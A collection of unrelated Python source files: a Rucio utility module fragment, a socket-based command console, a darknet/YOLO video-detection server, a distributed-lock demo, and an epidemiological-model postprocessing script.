parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args parametres of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
|
Console.py
|
###############################################################################
#
#
# <legal_notice>
# * BSD License 2.0
# *
# * Copyright (c) 2021, MaxLinear, Inc.
# *
# * Redistribution and use in source and binary forms, with or without
# * modification, are permitted provided that the following conditions are met:
# * 1. Redistributions of source code must retain the above copyright notice,
# * this list of conditions and the following disclaimer.
# * 2. Redistributions in binary form must reproduce the above copyright notice,
# * this list of conditions and the following disclaimer in the documentation
# * and/or other materials provided with the distribution.
# * 3. Neither the name of the copyright holder nor the names of its contributors
# * may be used to endorse or promote products derived from this software
# * without specific prior written permission.
# *
# * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# * IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# * OR PROFITS; OR BUSINESS INTERRUPTION HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)
# * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# * POSSIBILITY OF SUCH DAMAGE.
# </legal_notice>
#
#
###############################################################################
import socket
import Config
import threading
import Log
from Singleton import singleton
from RemoteConsole import CRemoteConsole
# DEFAULT_CONSOLE_PORT = 61000
class CConsole(object):
__metaclass__ = singleton
def __init__(self):
self.__running = False
self.__consoleThread = None
self.__listenSocket = None
self.__connSocket = None
self.__connected = False
self.__consoleCommands = {}
self.__consoleMutex = threading.Lock()
self.__remoteConsole = CRemoteConsole()
def start(self, port):
result = True
if self.__running:
result = False
self.command_register("quit", self.close_connection, "Exit the console")
self.command_register("help", self.show_help, "Show this help")
if result:
try:
# Open socket
self.__running = True
self.__listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ("", port) # to connect from outside the machine
self.__listenSocket.bind(server_address)
Log.logger.info('starting up on %s port %s' % server_address)
except socket.error, v:
Log.logger.error('Exception starting console, %s' % v.strerror)
result = False
if result:
try:
self.__running = True
self.__consoleThread = threading.Thread(target=self.console_thread, args=())
self.__consoleThread.start()
except StandardError:
result = False
Log.logger.error("Error start console")
return result
def stop(self):
try:
self.__running = False
if self.__connSocket is not None:
self.__connSocket.shutdown(socket.SHUT_RDWR)
self.__connSocket.close()
if self.__listenSocket is not None:
self.__listenSocket.shutdown(socket.SHUT_RDWR)
self.__listenSocket.close()
except socket.error, v:
Log.logger.error("Error closing Console sockets. " + v.strerror)
def command_register(self, command_name, callback_func, description):
if command_name not in self.__consoleCommands:
self.__consoleCommands[command_name] = (callback_func, description)
def console_thread(self):
if not self.__running:
return
try:
# Listen for incoming connections
self.__listenSocket.listen(1)
except socket.error, v:
Log.logger.error('Socket error listening' + v.strerror)
Log.logger.info('Console initialized')
while self.__running:
try:
# Wait for a connection
self.__connSocket, client_address = self.__listenSocket.accept()
Log.logger.post(Log.LogType.Debug, "new console connection")
self.__connected = True
self.handle_connection()
except socket.error:
Log.logger.error('Exception accepting new connection')
self.__running = False
def handle_connection(self):
while self.__connected:
self.write("\ndispatcher$ ")
try:
rx_data = str(self.__connSocket.recv(4096))
rx_data = rx_data.rstrip()
if self.__running:
if self.__remoteConsole.connected:
if rx_data == "quit":
self.__remoteConsole.stop()
else:
rx_data = rx_data+"\r"
self.__remoteConsole.send(rx_data)
else:
args = rx_data.split()
if len(args) >= 1:
self.execute_command(args)
if not self.__connected or not self.__running:
self.__connSocket.shutdown(socket.SHUT_RDWR)
self.__connSocket.close()
self.__connected = False
except socket.error:
self.__connected = False
Log.logger.error("Exception receiving data")
def write(self, data):
if not self.__running or not self.__connected:
return
try:
self.__consoleMutex.acquire()
if self.__connSocket.sendall(data) is not None:
Log.logger.error("Error sending data to console")
except socket.error:
self.__connected = False
Log.logger.error('Exception sending data to console')
finally:
self.__consoleMutex.release()
def execute_command(self, args):
# print "command \"%s\" len %d type %s" % (command_name, len(command_name), type(command_name))
command_name = args[0]
if command_name in self.__consoleCommands:
(func, desc) = self.__consoleCommands[command_name]
#execute function
func(args)
self.write("\nOK")
elif command_name == "h":
self.show_help()
self.write("\nOK")
else:
#send error
self.write("\nKO")
def show_help(self, args):
self.write("\nList of commands:")
for command in self.__consoleCommands:
self.write("\n\t%s\t- %s" % (command, self.__consoleCommands[command][1]))
def close_connection(self, args):
self.__connected = False
def open_remote_console(self, ip, port):
return self.__remoteConsole.start(ip, port)
|
darknet1.py
|
#!python3
'''
##############################
### Receive Video stream #####
### from Android client #######
### Use yolo to do detect ####
## (return a message to the mobile device) ##
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import time
import threading
import Queue
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/nano/darknet/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9001
CTL_PORT=11111
BUFFER_SIZE = 256
QUATO = 100
Interval = 10
Latency = []
Count = 0
def connect_controller():
global QUATO
global Latency
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data) <=0:
break
Latency = []
data = np.fromstring(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
time.sleep(Interval)
if len(Latency) ==0:
Latency.append(1e-1)
send_data = np.mean(Latency[-5:]) * np.ones(BUFFER_SIZE, dtype=np.double)
controller.sendall(send_data)
def recImage(client,data,q):
frameid = 1
while True:
buf = ''
while len(buf)<4:
buf += client.recv(4-len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
#q.put(decimg)
#print "frame %d finish offloading" % frameid
#f2 = open('/home/nvidia/Desktop/haoxin/images/newNexus320/320off/datasize320.txt','a')
#print >> f2, "%f" %size
#f2.close()
#if frameid>= 45 and frameid<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%2d.bmp" %frameid,decimg)
frameid += 1
def recv_image_from_socket(client, data):
buf = ''
while len(buf)<4:
buf += client.recv(4-len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
global QUATO
#check if image is an OpenCV frame
if isinstance(image, np.ndarray):
#StartTime0 = time.time()
# GET C,H,W, and DATA values
#print ('1')
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
else:
im = load_image(image, 0, 0)
print ('2')
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, QUATO)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
calssnamess = meta.names[i].decode('UTF-8')
res.append((calssnamess, dets[j].prob[i], (b.x, b.y, b.w, b.h),classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im,frameID):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
if ((x3<=im.shape[0]) and (y3>=0)):
cv2.putText(im, text, (x3,y3), font, 0.5, color, 1,cv2.CV_AA)
else:
cv2.putText(im, text, (int(x1),int(y1+6)), font, 0.5, color, 1,cv2.CV_AA)
#if frameID>= 45 and frameID<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%3d.bmp" %frameID,im)
cv2.imshow('Detection Window', im)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
detect_net = load_net("./cfg/yolov3-320.cfg", "yolov3.weights", 0)
detect_meta = load_meta("cfg/coco.data")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
client,addr=s.accept()
print ("Get new user socket")
data = b''
frameID = 1
starttime = time.time()
q = Queue.Queue()
#q = Queue.LifoQueue()
#t = threading.Thread(target = recImage,args=(client,data,q))
#t.setDaemon(True)
#t.start()
StartTime = time.time()
while True:
decimg = recv_image_from_socket(client,data)
compTime = time.time()
result = detect(detect_net, detect_meta, decimg, thresh=0.7)
#print('comp: ' + str(time.time() - compTime))
#print('real: ' + str(0.14 + 4.63/(QUATO+0.454)))
str1 = '0'+'\n'
client.sendall(str1.encode())
Latency.append(time.time() - StartTime)
print('round-trip latency is ' + str(time.time() - StartTime))
StartTime = time.time()
|
interrupt.py
|
from distrilockper import Config
from distrilockper.lock_helper import DistributerLockHelper
import _thread
config = Config()
config.use_single_server().set_config(host='0.0.0.0', port=6379)
helper = DistributerLockHelper()
helper.create(config)
class ticketSalse():
def __init__(self):
self.ticket_count = 1
def buy(self):
print('run')
_thread.exit()
print("kill")
Locker1 = helper.get_reentrant_lock(key='ticketSalse')
re1 = Locker1.try_lock(2, 10, 'second')
print("get lock:", re1)
if re1:
if self.ticket_count > 0:
self.ticket_count -= 1
print("sale one, remain: ", self.ticket_count)
Locker1.unlock()
Locker1.unlock()
else:
print("get lock failed")
print(self.ticket_count)
def ticket_num(self):
print(self.ticket_count)
import threading
import time
sale = ticketSalse()
threads = []
for i in range(100):
# print(i)
threads.append(threading.Thread(target = sale.buy))
threads[i].start()
|
postprocess.py
|
"""Postprocesses data across dates and simulation runs before aggregating at geographic levels (ADM0, ADM1, or ADM2)."""
import argparse
import gc
import glob
import logging
import os
from multiprocessing import JoinableQueue, Pool, Process
from pathlib import Path
import numpy as np
import pandas as pd
import tqdm
from .numerical_libs import use_cupy
from .util.read_config import bucky_cfg
from .viz.geoid import read_geoid_from_graph, read_lookup
def divide_by_pop(dataframe, cols):
"""Given a dataframe and list of columns, divides the columns by the population column ('N').
Parameters
----------
dataframe : DataFrame
Simulation data
cols : list of str
Column names to scale by population
Returns
-------
dataframe : DataFrame
Original dataframe with the requested columns scaled
"""
for col in cols:
dataframe[col] = dataframe[col] / dataframe["total_population"]
return dataframe
# Initialize argument parser
parser = argparse.ArgumentParser(description="Bucky Model postprocessing")
# Required: File to process
parser.add_argument(
"file",
default=max(
glob.glob(bucky_cfg["raw_output_dir"] + "/*/"),
key=os.path.getctime,
default="Most recently created folder in raw_output_dir",
),
nargs="?",
type=str,
help="File to proess",
)
# Graph file used for this run. Defaults to most recently created
parser.add_argument(
"-g",
"--graph_file",
default=None,
type=str,
help="Graph file used for simulation",
)
# Aggregation levels, e.g. state, county, etc.
parser.add_argument(
"-l",
"--levels",
default=["adm0", "adm1", "adm2"],
nargs="+",
type=str,
help="Levels on which to aggregate",
)
# Quantiles
default_quantiles = [
0.01,
0.025,
0.050,
0.100,
0.150,
0.200,
0.250,
0.300,
0.350,
0.400,
0.450,
0.500,
0.550,
0.600,
0.650,
0.7,
0.750,
0.800,
0.85,
0.9,
0.950,
0.975,
0.990,
]
parser.add_argument(
"-q",
"--quantiles",
default=default_quantiles,
nargs="+",
type=float,
help="Quantiles to process",
)
# Top-level output directory
parser.add_argument(
"-o",
"--output",
default=bucky_cfg["output_dir"],
type=str,
help="Directory for output files",
)
# Prefix for filenames
parser.add_argument(
"--prefix",
default=None,
type=str,
help="Prefix for output folder (default is UUID)",
)
# Specify optional end date
parser.add_argument("--end_date", default=None, type=str)
# Can pass in a lookup table to use in place of graph
parser.add_argument(
"--lookup",
default=None,
type=str,
help="Lookup table defining geoid relationships",
)
parser.add_argument(
"-n",
"--nprocs",
default=1,
type=int,
help="Number of threads doing aggregations, more is better till you go OOM...",
)
parser.add_argument("-cpu", "--cpu", action="store_true", help="Do not use cupy")
parser.add_argument("--verify", action="store_true", help="Verify the quality of the data")
parser.add_argument(
"--no-sort",
"--no_sort",
action="store_true",
help="Skip sorting the aggregated files",
)
# Optional flags
parser.add_argument("-v", "--verbose", action="store_true", help="Print extra information")
if __name__ == "__main__":
args = parser.parse_args()
# set_start_method("fork")
# Start parsing args
quantiles = args.quantiles
verbose = args.verbose
prefix = args.prefix
use_gpu = not args.cpu
if verbose:
logging.info(args)
# File Management
top_output_dir = args.output
# Check if it exists, make if not
if not os.path.exists(top_output_dir):
os.makedirs(top_output_dir)
# Use lookup, add prefix
if args.lookup is not None:
lookup_df = read_lookup(args.lookup)
if prefix is None:
prefix = Path(args.lookup).stem
else:
lookup_df = read_geoid_from_graph(args.graph_file)
# Create subfolder for this run using UUID of run
uuid = args.file.split("/")[-2]
if prefix is not None:
uuid = prefix + "_" + uuid
# Create directory if it doesn't exist
output_dir = os.path.join(top_output_dir, uuid)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Get aggregation levels
agg_levels = args.levels
lookup_df = lookup_df.set_index("adm2")
admin2_key = "adm2_id"
all_files = glob.glob(args.file + "/*.feather")
all_files_df = pd.DataFrame(
[x.split("/")[-1].split(".")[0].split("_") for x in all_files],
columns=["rid", "date"],
)
dates = all_files_df.date.unique().tolist()
to_write = JoinableQueue()
def _writer(q):
# Call to_write.get() until it returns None
has_header_dict = {}
for fname, df in iter(q.get, None):
if fname in has_header_dict:
df.to_csv(fname, header=False, mode="a")
else:
df.to_csv(fname, header=True, mode="w")
has_header_dict[fname] = True
q.task_done()
q.task_done()
write_thread = Process(target=_writer, args=(to_write,))
write_thread.deamon = True
write_thread.start()
def _process_date(date, write_queue=to_write):
date_files = glob.glob(args.file + "/*_" + str(date) + ".feather") # [:NFILES]
# Read feather files
run_data = [pd.read_feather(f) for f in date_files]
tot_df = pd.concat(run_data)
# force GC to free up lingering cuda allocs
del run_data
gc.collect()
# Get start date of simulation
# start_date = tot_df["date"].min()
# If user passes in an end date, use it
if args.end_date is not None:
end_date = pd.to_datetime(args.end_date)
# Otherwise use last day in data
else:
end_date = tot_df["date"].max()
# Drop data not within requested time range
tot_df = tot_df.loc[(tot_df["date"] <= end_date)]
# Some lookups only contain a subset of counties, drop extras if necessary
# TODO this replaced with a left join now that the keys are consistant (if its faster)
unique_adm2 = lookup_df.index
tot_df = tot_df.loc[tot_df[admin2_key].isin(unique_adm2)]
# List of columns that will be output per 100k population as well
per_capita_cols = ["cumulative_reported_cases", "cumulative_deaths", "current_hospitalizations"]
# Multiply column by N, then at end divide by aggregated N
pop_mean_cols = ["case_reporting_rate", "R_eff", "doubling_t"]
for col in pop_mean_cols:
tot_df[col] = tot_df[col] * tot_df["total_population"]
# No columns should contain negatives or NaNs
nan_vals = tot_df.isna().sum()
if nan_vals.sum() > 0:
logging.error("NANs are present in output data: \n" + str(nan_vals))
if args.verify:
# Check all columns except date for negative values
if (
tot_df.drop(columns=["date"]).lt(-1).sum() > 0
).any(): # TODO this drop does a deep copy and is super slow
logging.error("Negative values are present in output data.")
# Check for floating point errors
if (tot_df.drop(columns=["date"]).lt(0).sum() > 0).any(): # TODO same here
logging.warning("Floating point errors are present in output data.")
# NB: this has to happen after we fork the process
# see e.g. https://github.com/chainer/chainer/issues/1087
if use_gpu:
use_cupy(optimize=True)
from .numerical_libs import xp # isort:skip # pylint: disable=import-outside-toplevel
for level in agg_levels:
logging.info("Currently processing: " + level)
if level != "adm2":
# Create a mapping for aggregation level
level_dict = lookup_df[level].to_dict()
levels = np.unique(list(level_dict.values()))
else:
levels = lookup_df.index.values
level_dict = {x: x for x in levels}
level_map = dict(enumerate(levels))
level_inv_map = {v: k for k, v in level_map.items()}
# Apply map
tot_df[level] = tot_df[admin2_key].map(level_dict).map(level_inv_map).astype(int)
# Compute quantiles
def quantiles_group(tot_df):
# TODO why is this in the for loop? pretty sure we can move it but check for deps
# Kernel opt currently only works on reductions (@v8.0.0) but maybe someday it'll help here
with xp.optimize_kernels():
# can we do this pivot in cupy?
tot_df_stacked = tot_df.stack()
tot_df_unstack = tot_df_stacked.unstack("rid")
percentiles = xp.array(quantiles) * 100.0
test = xp.percentile(xp.array(tot_df_unstack.to_numpy()), q=percentiles, axis=1)
q_df = (
pd.DataFrame(
xp.to_cpu(test.T),
index=tot_df_unstack.index,
columns=quantiles,
)
.unstack()
.stack(level=0)
.reset_index()
.rename(columns={"level_2": "quantile"})
)
return q_df
g = tot_df.groupby([level, "date", "rid"]).sum().groupby(level)
q_df = g.apply(quantiles_group)
q_df[level] = q_df[level].round().astype(int).map(level_map)
q_df = q_df.set_index([level, "date", "quantile"])
per_cap_dict = {}
for col in per_capita_cols:
per_cap_dict[col + "_per_100k"] = (q_df[col] / q_df["total_population"]) * 100000.0
q_df = q_df.assign(**per_cap_dict)
q_df = divide_by_pop(q_df, pop_mean_cols)
# Column management
# if level != admin2_key:
